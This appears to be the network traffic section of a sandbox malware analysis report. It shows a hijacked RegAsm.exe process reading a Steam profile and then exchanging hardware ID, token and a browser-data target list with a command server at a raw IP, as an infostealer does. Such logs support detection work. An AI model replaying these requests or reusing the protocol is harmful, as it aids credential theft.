Apr 29, 2024 22:14:06.475032091 CEST	192.168.2.4	1.1.1.1	0xe8ea	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 29, 2024 22:12:57.153511047 CEST	1.1.1.1	192.168.2.4	0xe728	No error (0)	steamcommunity.com	23.210.138.105	A (IP address)	IN (0x0001)	false
Apr 29, 2024 22:13:02.482796907 CEST	1.1.1.1	192.168.2.4	0x4a1f	No error (0)	www.google.com		65	IN (0x0001)	false
Apr 29, 2024 22:13:02.482851982 CEST	1.1.1.1	192.168.2.4	0xc3b3	No error (0)	www.google.com	142.250.191.164	A (IP address)	IN (0x0001)	false
Apr 29, 2024 22:14:06.585498095 CEST	1.1.1.1	192.168.2.4	0xa8c3	No error (0)	www.google.com	142.250.191.196	A (IP address)	IN (0x0001)	false
Apr 29, 2024 22:14:06.585542917 CEST	1.1.1.1	192.168.2.4	0xe8ea	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

95.217.242.142

www.google.com

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.210.138.105	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:12:57 UTC	119	OUT	GET /profiles/76561199680449169 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:12:57 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 29 Apr 2024 20:12:57 GMT Content-Length: 33795 Connection: close Set-Cookie: sessionid=c3d738fe937f6f41216b0482; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1a3fb9ece96beaac5d6062fddfc395f9; Path=/; Secure; HttpOnly; SameSite=None
2024-04-29 20:12:57 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-29 20:12:57 UTC	16384	IN	Data Raw: 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 Data Ascii: global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-29 20:12:57 UTC	2897	IN	Data Raw: 20 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 75 6e 74 5f 6c 69 6e 6b 5f 70 72 65 76 69 65 77 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 20 6c 65 66 74 3b 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 6d 61 69 6e 74 61 69 6e 58 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 62 46 6f 63 75 73 52 69 6e 67 52 6f 6f 74 26 71 75 6f 74 3b 3a 74 72 75 65 Data Ascii: ><div class="profile_count_link_preview"><div style="clear: left;"></div></div></div></div><div data-panel="{"maintainX":true,"bFocusRingRoot":true

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:12:59 UTC	234	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:00 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:00 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 32 41 38 37 37 39 36 37 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="hwid"A82A877967E23924696330-a33c7340-61ca-11ee-8c18-806e6f6e6963------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------
2024-04-29 20:13:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:01 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|24c4d4939bc918be2cb92a617d99a9f0\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:02 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-29 20:13:02 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------FCGIJDBAFCBAAKECGDGCCont
2024-04-29 20:13:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-29 20:13:02 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:02 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 20:13:02 UTC	1703	IN	HTTP/1.1 200 OK Date: Mon, 29 Apr 2024 20:13:02 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sgYTWz9VKczE2bPumLouXQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-29 20:13:02 UTC	1703	IN	Data Raw: 31 62 32 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 36 20 70 72 6f 20 6d 61 78 22 2c 22 72 61 72 65 20 6f 6e 65 20 64 6f 6c 6c 61 72 20 62 69 6c 6c 73 22 2c 22 6e 79 63 20 63 68 65 65 73 65 20 62 61 6c 6c 73 22 2c 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 22 2c 22 6d 61 6e 6f 72 20 6c 6f 72 64 73 20 67 61 6d 65 22 2c 22 6d 69 66 66 6c 69 6e 20 73 74 72 65 65 74 20 62 6c 6f 63 6b 20 70 61 72 74 79 20 63 61 72 22 2c 22 64 65 61 64 70 6f 6f 6c 20 77 6f 6c 76 65 72 69 6e 65 20 74 72 61 69 6c 65 72 22 2c 22 6e 65 78 74 20 67 65 6e 20 66 61 6c 6c 6f 75 74 20 75 70 64 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 Data Ascii: 1b23)]}'["",["apple iphone 16 pro max","rare one dollar bills","nyc cheese balls","chicago bears","manor lords game","mifflin street block party car","deadpool wolverine trailer","next gen fallout update"],["","","","","","","",""],[],{"google:clientda
2024-04-29 20:13:02 UTC	1703	IN	Data Raw: 32 31 46 53 32 64 46 53 57 74 4a 51 32 35 5a 4d 54 4a 75 51 56 42 74 55 33 70 34 64 47 56 48 5a 6e 52 33 54 58 42 74 54 6d 6c 50 63 47 6c 46 4b 30 51 33 57 6c 45 35 63 30 6c 51 61 55 74 75 4e 56 64 4b 62 6d 68 6a 64 44 59 72 57 6e 70 52 63 47 4d 31 5a 30 4a 75 62 32 68 4a 55 7a 59 30 51 31 4a 33 55 69 74 57 64 7a 64 4a 59 6b 46 7a 63 46 70 43 57 6c 46 48 62 57 68 46 55 7a 55 31 52 6e 68 72 5a 55 56 59 4f 48 46 76 63 30 4a 46 53 6d 35 56 53 57 34 33 4e 57 56 47 64 30 70 77 4e 30 31 4e 56 33 52 76 65 46 45 32 4d 53 39 4e 65 56 59 31 62 6d 5a 6f 54 47 70 61 56 45 70 4a 54 31 56 52 4d 57 46 4d 52 45 6f 7a 55 48 52 70 56 69 39 49 51 56 4d 32 52 45 46 30 53 6b 6c 70 5a 47 39 54 53 55 64 57 53 54 56 78 4d 30 67 77 61 6d 4a 44 61 45 64 54 61 44 64 4b 57 54 68 78 Data Ascii: 21FS2dFSWtJQ25ZMTJuQVBtU3p4dGVHZnR3TXBtTmlPcGlFK0Q3WlE5c0lQaUtuNVdKbmhjdDYrWnpRcGM1Z0Jub2hJUzY0Q1J3UitWdzdJYkFzcFpCWlFHbWhFUzU1RnhrZUVYOHFvc0JFSm5VSW43NWVGd0pwN01NV3RveFE2MS9NeVY1bmZoTGpaVEpJT1VRMWFMREozUHRpVi9IQVM2REF0SklpZG9TSUdWSTVxM0gwamJDaEdTaDdKWThx
2024-04-29 20:13:02 UTC	1703	IN	Data Raw: 4e 54 46 30 5a 48 59 76 64 6d 31 72 52 45 35 35 55 56 64 4c 4d 31 68 78 4d 44 6b 7a 4c 7a 4a 36 4c 30 5a 6d 63 31 68 51 4d 47 6c 4c 51 69 38 77 4e 32 5a 75 63 30 46 42 51 55 46 42 55 31 56 57 54 31 4a 4c 4e 55 4e 5a 53 55 6b 39 4f 67 31 44 61 47 6c 6a 59 57 64 76 49 45 4a 6c 59 58 4a 7a 53 67 63 6a 59 54 4d 79 5a 54 41 77 55 6a 5a 6e 63 31 39 7a 63 33 41 39 5a 55 70 36 61 6a 52 30 52 46 41 78 56 47 4e 33 63 6b 52 52 64 55 30 79 52 44 41 30 61 7a 4e 50 65 55 56 34 54 31 52 4e 4f 56 68 54 52 58 42 4f 54 45 4e 76 52 30 46 47 4d 6d 78 43 4c 56 46 77 42 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 30 76 5a 79 38 78 4d 57 70 32 62 6a 5a 36 65 56 38 32 45 Data Ascii: NTF0ZHYvdm1rRE55UVdLM1hxMDkzLzJ6L0Zmc1hQMGlLQi8wN2Zuc0FBQUFBU1VWT1JLNUNZSUk9Og1DaGljYWdvIEJlYXJzSgcjYTMyZTAwUjZnc19zc3A9ZUp6ajR0RFAxVGN3ckRRdU0yRDA0azNPeUV4T1RNOVhTRXBOTENvR0FGMmxCLVFwBw\u003d\u003d","zl":10002},{"google:entityinfo":"Cg0vZy8xMWp2bjZ6eV82E
2024-04-29 20:13:03 UTC	1703	IN	Data Raw: 57 5a 4b 64 31 42 75 55 33 52 56 5a 58 4d 30 52 54 4e 69 53 6e 46 6f 61 58 5a 4b 52 7a 68 45 56 6b 51 32 63 6e 5a 56 4f 54 64 7a 4d 47 78 49 52 6c 55 35 54 30 39 61 62 45 78 7a 65 46 6c 6e 63 55 64 43 55 45 67 33 59 58 4d 35 63 57 4e 61 54 55 70 6d 53 6c 5a 44 64 6c 4d 78 61 32 4e 71 4f 56 64 54 62 55 56 4c 65 55 74 47 61 31 52 78 59 6a 42 43 65 55 4e 54 51 56 59 72 61 30 67 79 65 6e 67 76 52 32 63 77 63 45 70 48 63 55 35 36 52 6b 5a 44 4f 47 6c 52 5a 48 4d 76 62 30 31 6b 4c 33 64 44 4b 33 46 34 61 6c 5a 34 55 30 4a 51 64 7a 68 78 64 45 31 6d 4e 6d 46 4c 61 45 63 34 53 45 46 48 51 6a 56 43 65 48 67 72 64 6e 70 79 65 55 39 77 63 55 70 77 4d 6c 4e 57 4d 31 64 5a 54 57 52 35 62 45 31 72 52 55 46 42 4e 55 49 72 4d 6e 4e 69 63 55 38 34 52 32 56 74 5a 58 5a 71 Data Ascii: WZKd1BuU3RVZXM0RTNiSnFoaXZKRzhEVkQ2cnZVOTdzMGxIRlU5T09abExzeFlncUdCUEg3YXM5cWNaTUpmSlZDdlMxa2NqOVdTbUVLeUtGa1RxYjBCeUNTQVYra0gyengvR2cwcEpHcU56RkZDOGlRZHMvb01kL3dDK3F4alZ4U0JQdzhxdE1mNmFLaEc4SEFHQjVCeHgrdnpyeU9wcUpwMlNWM1dZTWR5bE1rRUFBNUIrMnNicU84R2VtZXZq
2024-04-29 20:13:03 UTC	143	IN	Data Raw: 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: ],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","ENTITY","ENTITY","QUERY","QUERY","QUERY"]}]
2024-04-29 20:13:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49739	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:03 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49740	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:03 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 20:13:03 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIz_6_sQYQ8ZW9qgISBFG1Plo Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Mon, 29 Apr 2024 20:13:03 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-29-20; expires=Wed, 29-May-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: 